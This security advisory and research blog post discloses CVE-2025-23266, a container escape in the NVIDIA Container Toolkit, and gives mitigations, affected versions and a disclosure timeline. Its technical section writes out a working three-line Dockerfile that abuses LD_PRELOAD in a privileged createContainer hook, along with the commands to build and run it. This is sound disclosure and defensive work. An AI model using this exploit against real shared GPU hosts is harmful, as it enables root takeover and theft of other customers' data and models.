NVIDIAScape - Critical NVIDIA AI Vulnerability: A Three-Line Container Escape in NVIDIA Container Toolkit (CVE-2025-23266)

A new critical vulnerability with a 9.0 CVSS score presents a systemic risk to the AI ecosystem, with widespread implications for AI infrastructure.


Executive Summary

Wiz Research discovered a critical container escape vulnerability in the NVIDIA Container Toolkit (NCT), which we've dubbed #NVIDIAScape. This toolkit powers many AI services offered by cloud and SaaS providers, and the vulnerability, now tracked as CVE-2025-23266, has been assigned a CVSS score of 9.0 (Critical). It allows a malicious container to bypass isolation measures and gain full root access to the host machine. This flaw stems from a subtle misconfiguration in how the toolkit handles OCI hooks, and it can be exploited with a stunningly simple three-line Dockerfile.

Because the NVIDIA Container Toolkit is the backbone for many managed AI and GPU services across all major cloud providers, this vulnerability represents a systemic risk to the AI ecosystem, potentially allowing attackers to tear down the walls separating different customers, affecting thousands of organizations.

The danger of this vulnerability is most acute in managed AI cloud services that allow customers to run their own AI containers on shared GPU infrastructure. In this scenario, a malicious customer could use this vulnerability to run a specially crafted container, escape its intended boundaries, and achieve full root control of the host machine. From there, the attacker could access, steal, or manipulate the sensitive data and proprietary models of all other customers running on the same shared hardware.

This is exactly the class of vulnerability that has proven to be a systemic risk across the AI cloud. A few months ago, Wiz Research demonstrated how similar container escape flaws allowed access to sensitive customer data in major services like Replicate and DigitalOcean. The recurrence of these fundamental issues highlights the urgent need to scrutinize the security of our core AI infrastructure as the world races to adopt it.

Mitigation and Recommendations

Affected Components: 

  • NVIDIA Container Toolkit: All versions up to and including v1.17.7 (CDI mode only for versions prior to 1.17.5) 

  • NVIDIA GPU Operator: All versions up to and including 25.3.1 

The primary recommendation is to upgrade to the latest version of the NVIDIA Container Toolkit as advised in the NVIDIA security bulletin.


Find vulnerable instances with Wiz

Wiz customers can use this pre-built query in the Wiz Threat Intel Center to find vulnerable instances of the NVIDIA Container Toolkit in their environment.

Prioritization and Context

Patching is highly recommended for all container hosts running vulnerable versions of the toolkit. Since the exploit is delivered inside the container image itself, we advise prioritizing hosts that are likely to run containers built from untrusted or public images. Further prioritization can be achieved through runtime validation to focus patching efforts on instances where the vulnerable toolkit is actively in use.

It is important to note that internet exposure is not a relevant factor for triaging this vulnerability. The affected host does not need to be publicly exposed. Instead, initial access vectors may include social engineering attempts against developers, supply chain scenarios where an attacker has prior access to a container image repository, or any environment that allows users to load arbitrary images.


Technical Mitigations

For systems that cannot be immediately upgraded, NVIDIA has provided several mitigation options. The primary method is to opt out of using the enable-cuda-compat hook, which is the source of the exposure.

For NVIDIA Container Runtime

When using the NVIDIA Container Runtime in legacy mode, you can disable the hook by editing the /etc/nvidia-container-toolkit/config.toml file and setting the features.disable-cuda-compat-lib-hook flag to true:

[features]
disable-cuda-compat-lib-hook = true

For NVIDIA GPU Operator

When using the NVIDIA GPU Operator, you can disable the hook by adding disable-cuda-compat-lib-hook to the NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES environment variable. This can be done by including the following arguments when installing or upgrading the GPU Operator with Helm:

--set "toolkit.env[0].name=NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES" \
--set "toolkit.env[0].value=disable-cuda-compat-lib-hook"

Note: Any other feature flags should be added as a comma-separated list to the value field.
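For example, a complete upgrade command combining these arguments might look like the following sketch (the release name, namespace, and chart reference are assumptions; adjust them to match your deployment):

```shell
# Hypothetical example: upgrade an existing GPU Operator release and
# opt in to the mitigation flag. Release/namespace names are assumed.
helm upgrade gpu-operator nvidia/gpu-operator \
  -n gpu-operator \
  --set "toolkit.env[0].name=NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES" \
  --set "toolkit.env[0].value=disable-cuda-compat-lib-hook"
```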

For users with a GPU Operator version prior to 25.3.1, you can deploy the patched NVIDIA Container Toolkit version 1.17.8 by including the following arguments in your Helm command:

--set "toolkit.version=v1.17.8-ubuntu20.04"

Note: For Red Hat Enterprise Linux or Red Hat OpenShift, you must specify the v1.17.8-ubi8 tag.

Why research the NVIDIA Container Toolkit?

The entire AI revolution is built on the power of NVIDIA GPUs. In the cloud, the critical component that securely connects containerized applications to these GPUs is the NVIDIA Container Toolkit.

This is not the first time we've uncovered severe vulnerabilities in this core component. Last year, Wiz Research disclosed CVE-2024-0132, a similar container escape flaw that allowed for a full host takeover. These findings are part of our ongoing research into the security of the AI supply chain. We are investigating every layer of the AI stack, from the infrastructure (Hugging Face, Replicate, SAP AI Core) to the models themselves and the software used to run them (Ollama), to understand the real-world risks as the world races to adopt this new technology.

Technical Analysis

The path to this container escape lies not in a complex memory corruption bug, but in the subtle interplay between the container specification, a trusted host component, and a classic Linux trick. Understanding the exploit requires looking at three key parts: the OCI hook mechanism, the specific flaw in NVIDIA's implementation, and the weaponization of that flaw.


Understanding OCI Hooks and the NVIDIA Container Toolkit

The Open Container Initiative (OCI) specification defines a standard for container runtimes. Part of this standard is a "hook" system, which allows tools to run scripts at specific points in a container's lifecycle. The NVIDIA Container Toolkit (NCT) uses these hooks to perform its primary function: configuring a container to be able to communicate with the host's NVIDIA drivers and GPUs.

When a container is started with the NVIDIA runtime, the NCT registers several hooks, including the following createContainer hook:

"createContainer": [
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": ["nvidia-ctk", "hook", "enable-cuda-compat", "..."]
  },
  ...
]

This hook runs as a privileged process on the host to set up the necessary environment for the container. 


The OCI spec defines different types of hooks. While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to.

According to the OCI specification on GitHub:

“… on Linux this would happen before the pivot_root operation is executed but after the mount namespace was created and setup.”
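To make the inheritance concrete, here is a hand-written sketch (not generated by the toolkit; values are invented for illustration) of the relevant parts of a container's OCI config.json. The attacker-controlled variable sits in `process.env`, while the hook entry carries no `env` field of its own:

```json
{
  "process": {
    "env": ["PATH=/usr/sbin:/usr/bin", "LD_PRELOAD=/proc/self/cwd/poc.so"]
  },
  "hooks": {
    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": ["nvidia-ctk", "hook", "enable-cuda-compat", "..."]
      }
    ]
  }
}
```

Because the hook entry defines no `env` of its own, the privileged nvidia-ctk process ends up running with the container-supplied environment, including any variables the attacker baked into the image.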


Weaponizing the environment variables

With the ability to control the environment of the privileged hook, an attacker has many options. One of the most direct is to abuse LD_PRELOAD, a well-known and powerful Linux environment variable. LD_PRELOAD forces a process to load a specific user-defined shared library (.so file).

By setting LD_PRELOAD in their Dockerfile, an attacker could instruct the nvidia-ctk hook to load a malicious library. Making matters worse, the createContainer hook executes with its working directory set to the container's root filesystem. This means the malicious library can be loaded directly from the container image with a simple path, completing the exploit chain.

The Exploit: A Three-Line Dockerfile

One of the most alarming aspects of this vulnerability is its simplicity. An attacker only needs to build a container image with a malicious payload and the following three-line Dockerfile.

The Malicious Dockerfile:

FROM busybox
ENV LD_PRELOAD=/proc/self/cwd/poc.so
ADD poc.so /

When this container is run on a vulnerable system, the nvidia-ctk createContainer hook inherits the LD_PRELOAD variable. Since the hook's working directory is the container's filesystem, it loads the attacker's poc.so file into its own privileged process, instantly achieving a container escape.

To prove this, our poc.so payload simply runs the id command and writes the output to /owned on the host.

Running the exploit:

# Build the malicious container
$ docker build . -t nct-exploit

# Run it on a host with the vulnerable NVIDIA Container Toolkit
$ docker run --rm --runtime=nvidia --gpus=all nct-exploit

The result: Root on the Host

Responsible Disclosure Timeline

  • May 17, 2025: Initial vulnerability report submitted to NVIDIA at Pwn2Own Berlin.

  • July 15, 2025: NVIDIA published the security bulletin and assigned CVE-2025-23266.

  • July 17, 2025: Wiz Research publishes this blog post.

Conclusion

This vulnerability once more highlights that the most real and immediate risk to AI applications today comes from their underlying infrastructure and tooling. While the hype around AI security tends to focus on futuristic, AI-based attacks, “old-school” infrastructure vulnerabilities in the ever-growing AI tech stack remain the immediate threat that security teams should prioritize.

This practical attack surface is the result of the fast-paced introduction of new AI tools and services. It is therefore vital that security teams work closely with their AI engineers to gain visibility into the architecture, tooling, and AI models being used. Specifically, as this vulnerability demonstrates, it is important to build a mature pipeline for running AI models with full control over their source and integrity.

Additionally, this research highlights, not for the first time, that containers are not a strong security barrier and should not be relied upon as the sole means of isolation. When designing applications, especially for multi-tenant environments, one should always “assume a vulnerability” and implement at least one strong isolation barrier, such as virtualization (as explained in the PEACH framework). Wiz Research has written about this issue extensively, and you can read more about it in our previous research on Alibaba Cloud, IBM, Azure, Hugging Face, Replicate, and SAP.

Stay in touch!

Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), Andres Riancho (@andresriancho) and Yuval Avrahami (@yuvalavra) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io. 
